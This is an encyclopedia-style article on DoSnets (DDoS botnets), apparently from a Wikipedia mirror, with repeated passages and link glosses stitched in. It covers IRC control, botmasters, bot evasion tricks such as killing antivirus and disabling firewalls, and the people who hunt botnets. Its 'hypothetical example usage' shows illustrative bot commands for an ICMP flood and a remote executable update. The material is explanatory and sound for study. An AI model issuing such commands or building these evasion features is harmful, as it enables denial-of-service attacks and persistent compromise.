Dosnet
Encyclopedia
A DoSnet is a type of botnet
/malware
and mostly used as a term for malicious botnets while benevolent botnets often simply are referred to as botnets. Dosnets are used for Distributed Denial of Service (DDoS) attacks which can be very devastating.
They range in size from a couple of bots to a couple of thousand bots up to over a hundred thousand bots.
Many dosbots use the IRC
protocol, but some use their own custom protocols. Some may use a decentralized P2P
network. When IRC is used, the botmaster often has usermode +i (invisible) and the channel often has mode +psntk (private, secret, and need password to join). Sometimes the network is hosted on a public IRC network, while more capable botmasters host the network on private servers.
More advanced dosnets use technologies such as SSL
connections and cryptography
to prevent packet sniffing, data inspection, and analysis.
The botmaster can use the bots to "packet" (send a disruptive data flood) to other computers or networks. He/she can often also make them perform various other tasks, such as remotely fetching a new version of the bot software and updating themselves.
Well-known dosnet software includes TFN2k
, Stacheldraht
, and Trinoo
.
There are dosnet hunters who find dosnets and analyze the bots and/or the network in order to dismantle them. For example by discovering access to bots and commanding them to "uninstall" themselves if such a feature is present in the bot software, or to "update" themselves to a dud, or to download and execute some sort of cleaner. Advanced bots may use cryptographically signed
updates to make sure the update is authentic.
, bouncers or shells
to hide his IP address
for anonymity and uses a password
to authenticate himself. When the bots have verified the password (and possible other criteria for authentication) they are under botmaster's command.
Sometimes the botnet is shared, and multiple botmasters operate it together.
A botmaster may be a skilled black hat hacker
or just a mere script kiddie
.
Sometimes botmasters hijack bots from the dosnet of another botmaster by analyzing the bot or network, discovering the password, and commanding the bots to "update" themselves to his ownership.
.icmpflood 192.0.2.123 3500
.login my54kingdom78
.updatehttps://www.example.com/lolcat/mudkipz.exe
is usually stripped
of symbols and compressed
with tools (such as UPX
) to obfuscate the contents and to prevent reverse engineering
.
It's usually coded to automatically startup every time the computer (re)starts, and is also programmed to hide itself. Authentication is usually done by comparing the supplied password against a plaintext string or a cryptographic hash
(such as MD5
or SHA-1), which may be salted
for additional security.
Sometimes dosbots are installed together with a rootkit
which is to prevent the bot from detection.
They can often perform more than only one kind of attack. Attacks include TCP
, UDP
, ICMP
attacks. Advanced bots may use raw socket
s and construct custom packets to perform SYN flood
s and other spoofing
attacks.
Computers infected with dosbot agents are referred to as "zombies
".
The vast majority of the bots are written in the C
or C++
programming languages.
Many new bots are now infecting people via Java applet
s, so when a person with Java enabled visits a web page, the bot will execute Java code, and can then issue commands to connect to the DoSnet.
Commands for the bot may use a prefix such as an exclamation mark, at sign (@), or dot.
It may try to terminate the process
of known antivirus
and antimalware software in order to protect itself. It may disable security and update services.
It may copy itself into a randomly named file, or disguise itself with a name similar to a system service/process.
It may attempt to remove rival malware in order to prevent the system from behaving suspiciously.
It may try to disable the firewall
or add rules to open certain ports or allow certain connections.
It may include anti-debugging functionality.
Botnet
A botnet is a collection of compromised computers connected to the Internet. Termed "bots," they are generally used for malicious purposes. When a computer becomes compromised, it becomes a part of a botnet...
/malware
Malware
Malware, short for malicious software, consists of programming that is designed to disrupt or deny operation, gather information that leads to loss of privacy or exploitation, or gain unauthorized access to system resources, or that otherwise exhibits abusive behavior...
and mostly used as a term for malicious botnets while benevolent botnets often simply are referred to as botnets. Dosnets are used for Distributed Denial of Service (DDoS) attacks which can be very devastating.
They range in size from a couple of bots to a couple of thousand bots up to over a hundred thousand bots.
Many dosbots use the IRC
Internet Relay Chat
Internet Relay Chat is a protocol for real-time Internet text messaging or synchronous conferencing. It is mainly designed for group communication in discussion forums, called channels, but also allows one-to-one communication via private message as well as chat and data transfer, including file...
protocol, but some use their own custom protocols. Some may use a decentralized P2P
Peer-to-peer
Peer-to-peer computing or networking is a distributed application architecture that partitions tasks or workloads among peers. Peers are equally privileged, equipotent participants in the application...
network. When IRC is used, the botmaster often has usermode +i (invisible) and the channel often has mode +psntk (private, secret, and need password to join). Sometimes the network is hosted on a public IRC network, while more capable botmasters host the network on private servers.
More advanced dosnets use technologies such as SSL
Transport Layer Security
Transport Layer Security and its predecessor, Secure Sockets Layer , are cryptographic protocols that provide communication security over the Internet...
connections and cryptography
Cryptography
Cryptography is the practice and study of techniques for secure communication in the presence of third parties...
to prevent packet sniffing, data inspection, and analysis.
The botmaster can use the bots to "packet" (send a disruptive data flood) to other computers or networks. He/she can often also make them perform various other tasks, such as remotely fetching a new version of the bot software and updating themselves.
Well-known dosnet software includes TFN2k
Tribe Flood Network
The Tribe Flood Network or TFN is a set of computer programs to conduct various DDoS attacks such as ICMP flood, SYN flood, UDP flood and Smurf attack.First TFN initiated attacks are described in CERT...
, Stacheldraht
Stacheldraht
Stacheldraht is a piece of software written by Random for Linux and Solaris systems which acts as a distributed denial of service agent...
, and Trinoo
Trinoo
The trinoo or trin00 is a set of computer programs to conduct a DDoS attack. It is believed that trinoo networks has been set up on thousands of systems on the Internet that have been compromised by remote buffer overrun exploits....
.
There are dosnet hunters who find dosnets and analyze the bots and/or the network in order to dismantle them. For example by discovering access to bots and commanding them to "uninstall" themselves if such a feature is present in the bot software, or to "update" themselves to a dud, or to download and execute some sort of cleaner. Advanced bots may use cryptographically signed
Digital signature
A digital signature or digital signature scheme is a mathematical scheme for demonstrating the authenticity of a digital message or document. A valid digital signature gives a recipient reason to believe that the message was created by a known sender, and that it was not altered in transit...
updates to make sure the update is authentic.
Botmaster
The botmaster is the person who controls these bots/drones. He/she usually connects to the network via proxiesProxy server
In computer networks, a proxy server is a server that acts as an intermediary for requests from clients seeking resources from other servers. A client connects to the proxy server, requesting some service, such as a file, connection, web page, or other resource available from a different server...
, bouncers or shells
Shell account
A shell account is a user account on a remote server which gives access to a shell via a command-line interface protocol such as telnet or ssh....
to hide his IP address
IP address
An Internet Protocol address is a numerical label assigned to each device participating in a computer network that uses the Internet Protocol for communication. An IP address serves two principal functions: host or network interface identification and location addressing...
for anonymity and uses a password
Password
A password is a secret word or string of characters that is used for authentication, to prove identity or gain access to a resource . The password should be kept secret from those not allowed access....
to authenticate himself. When the bots have verified the password (and possible other criteria for authentication) they are under botmaster's command.
Sometimes the botnet is shared, and multiple botmasters operate it together.
A botmaster may be a skilled black hat hacker
Black hat
A black hat is the villain or bad guy, especially in a western movie in which such a character would stereotypically wear a black hat in contrast to the hero's white hat, especially in black and white movies....
or just a mere script kiddie
Script kiddie
A script kiddie or skiddie, occasionally skid, script bunny, script kitty, script-running juvenile or similar, is a derogatory term used to describe those who use scripts or programs developed by others to attack computer systems and networks and deface websites.-Characteristics:In a Carnegie...
.
Sometimes botmasters hijack bots from the dosnet of another botmaster by analyzing the bot or network, discovering the password, and commanding the bots to "update" themselves to his ownership.
Hypothetical example usage
.login my54kingdom78.icmpflood 192.0.2.123 3500
.login my54kingdom78
.update
Dosbot
The dosbot (Denial of Service bot, also called Distributed Denial of Service agent) is the client which is used to connect to the network and is also the software which performs any attacks. The executableExecutable
In computing, an executable file causes a computer "to perform indicated tasks according to encoded instructions," as opposed to a data file that must be parsed by a program to be meaningful. These instructions are traditionally machine code instructions for a physical CPU...
is usually stripped
Strip (Unix)
In Unix and Unix-like operating systems, the strip program removes unnecessary information from executable binary programs and object files, thus potentially resulting in better performance and sometimes significantly less disk space usage...
of symbols and compressed
Executable compression
Executable compression is any means of compressing an executable file and combining the compressed data with decompression code into a single executable. When this compressed executable is executed, the decompression code recreates the original code from the compressed code before executing it...
with tools (such as UPX
UPX
UPX, the Ultimate Packer for eXecutables, is a free and open source executable packer supporting a number of file formats from different operating systems.- Compression :...
) to obfuscate the contents and to prevent reverse engineering
Reverse engineering
Reverse engineering is the process of discovering the technological principles of a device, object, or system through analysis of its structure, function, and operation...
.
It's usually coded to automatically startup every time the computer (re)starts, and is also programmed to hide itself. Authentication is usually done by comparing the supplied password against a plaintext string or a cryptographic hash
Cryptographic hash function
A cryptographic hash function is a deterministic procedure that takes an arbitrary block of data and returns a fixed-size bit string, the hash value, such that an accidental or intentional change to the data will change the hash value...
(such as MD5
MD5
The MD5 Message-Digest Algorithm is a widely used cryptographic hash function that produces a 128-bit hash value. Specified in RFC 1321, MD5 has been employed in a wide variety of security applications, and is also commonly used to check data integrity...
or SHA-1), which may be salted
Salt (cryptography)
In cryptography, a salt consists of random bits, creating one of the inputs to a one-way function. The other input is usually a password or passphrase. The output of the one-way function can be stored rather than the password, and still be used for authenticating users. The one-way function...
for additional security.
Sometimes dosbots are installed together with a rootkit
Rootkit
A rootkit is software that enables continued privileged access to a computer while actively hiding its presence from administrators by subverting standard operating system functionality or other applications...
which is to prevent the bot from detection.
They can often perform more than only one kind of attack. Attacks include TCP
Transmission Control Protocol
The Transmission Control Protocol is one of the core protocols of the Internet Protocol Suite. TCP is one of the two original components of the suite, complementing the Internet Protocol , and therefore the entire suite is commonly referred to as TCP/IP...
, UDP
User Datagram Protocol
The User Datagram Protocol is one of the core members of the Internet Protocol Suite, the set of network protocols used for the Internet. With UDP, computer applications can send messages, in this case referred to as datagrams, to other hosts on an Internet Protocol network without requiring...
, ICMP
Internet Control Message Protocol
The Internet Control Message Protocol is one of the core protocols of the Internet Protocol Suite. It is chiefly used by the operating systems of networked computers to send error messages indicating, for example, that a requested service is not available or that a host or router could not be...
attacks. Advanced bots may use raw socket
Raw socket
In computer networking, a raw socket is a socket that allows direct sending and receiving of network packets by applications, bypassing all encapsulation in the networking software of the operating system. Most socket application programming interfaces , especially those based on Berkeley sockets,...
s and construct custom packets to perform SYN flood
SYN flood
A SYN flood is a form of denial-of-service attack in which an attacker sends a succession of SYN requests to a target's system in an attempt to consume enough server resources to make the system unresponsive to legitimate traffic.-Technical details:...
s and other spoofing
IP address spoofing
In computer networking, the term IP address spoofing or IP spoofing refers to the creation of Internet Protocol packets with a forged source IP address, called spoofing, with the purpose of concealing the identity of the sender or impersonating another computing system.-Background:The basic...
attacks.
Computers infected with dosbot agents are referred to as "zombies
Zombie computer
In computer science, a zombie is a computer connected to the Internet that has been compromised by a cracker, computer virus or trojan horse and can be used to perform malicious tasks of one sort or another under remote direction. Botnets of zombie computers are often used to spread e-mail spam...
".
The vast majority of the bots are written in the C
C (programming language)
C is a general-purpose computer programming language developed between 1969 and 1973 by Dennis Ritchie at the Bell Telephone Laboratories for use with the Unix operating system....
or C++
C++
C++ is a statically typed, free-form, multi-paradigm, compiled, general-purpose programming language. It is regarded as an intermediate-level language, as it comprises a combination of both high-level and low-level language features. It was developed by Bjarne Stroustrup starting in 1979 at Bell...
programming languages.
Many new bots are now infecting people via Java applet
Java applet
A Java applet is an applet delivered to users in the form of Java bytecode. Java applets can run in a Web browser using a Java Virtual Machine , or in Sun's AppletViewer, a stand-alone tool for testing applets...
s, so when a person with Java enabled visits a web page, the bot will execute Java code, and can then issue commands to connect to the DoSnet.
Commands for the bot may use a prefix such as an exclamation mark, at sign (@), or dot.
It may try to terminate the process
Process (computing)
In computing, a process is an instance of a computer program that is being executed. It contains the program code and its current activity. Depending on the operating system , a process may be made up of multiple threads of execution that execute instructions concurrently.A computer program is a...
of known antivirus
Antivirus software
Antivirus or anti-virus software is used to prevent, detect, and remove malware, including but not limited to computer viruses, computer worm, trojan horses, spyware and adware...
and antimalware software in order to protect itself. It may disable security and update services.
It may copy itself into a randomly named file, or disguise itself with a name similar to a system service/process.
It may attempt to remove rival malware in order to prevent the system from behaving suspiciously.
It may try to disable the firewall
Firewall (computing)
A firewall is a device or set of devices designed to permit or deny network transmissions based upon a set of rules and is frequently used to protect networks from unauthorized access while permitting legitimate communications to pass....
or add rules to open certain ports or allow certain connections.
It may include anti-debugging functionality.
See also
- BotnetBotnetA botnet is a collection of compromised computers connected to the Internet. Termed "bots," they are generally used for malicious purposes. When a computer becomes compromised, it becomes a part of a botnet...
- Denial-of-service attackDenial-of-service attackA denial-of-service attack or distributed denial-of-service attack is an attempt to make a computer resource unavailable to its intended users...
- MalwareMalwareMalware, short for malicious software, consists of programming that is designed to disrupt or deny operation, gather information that leads to loss of privacy or exploitation, or gain unauthorized access to system resources, or that otherwise exhibits abusive behavior...
- Zombie computerZombie computerIn computer science, a zombie is a computer connected to the Internet that has been compromised by a cracker, computer virus or trojan horse and can be used to perform malicious tasks of one sort or another under remote direction. Botnets of zombie computers are often used to spread e-mail spam...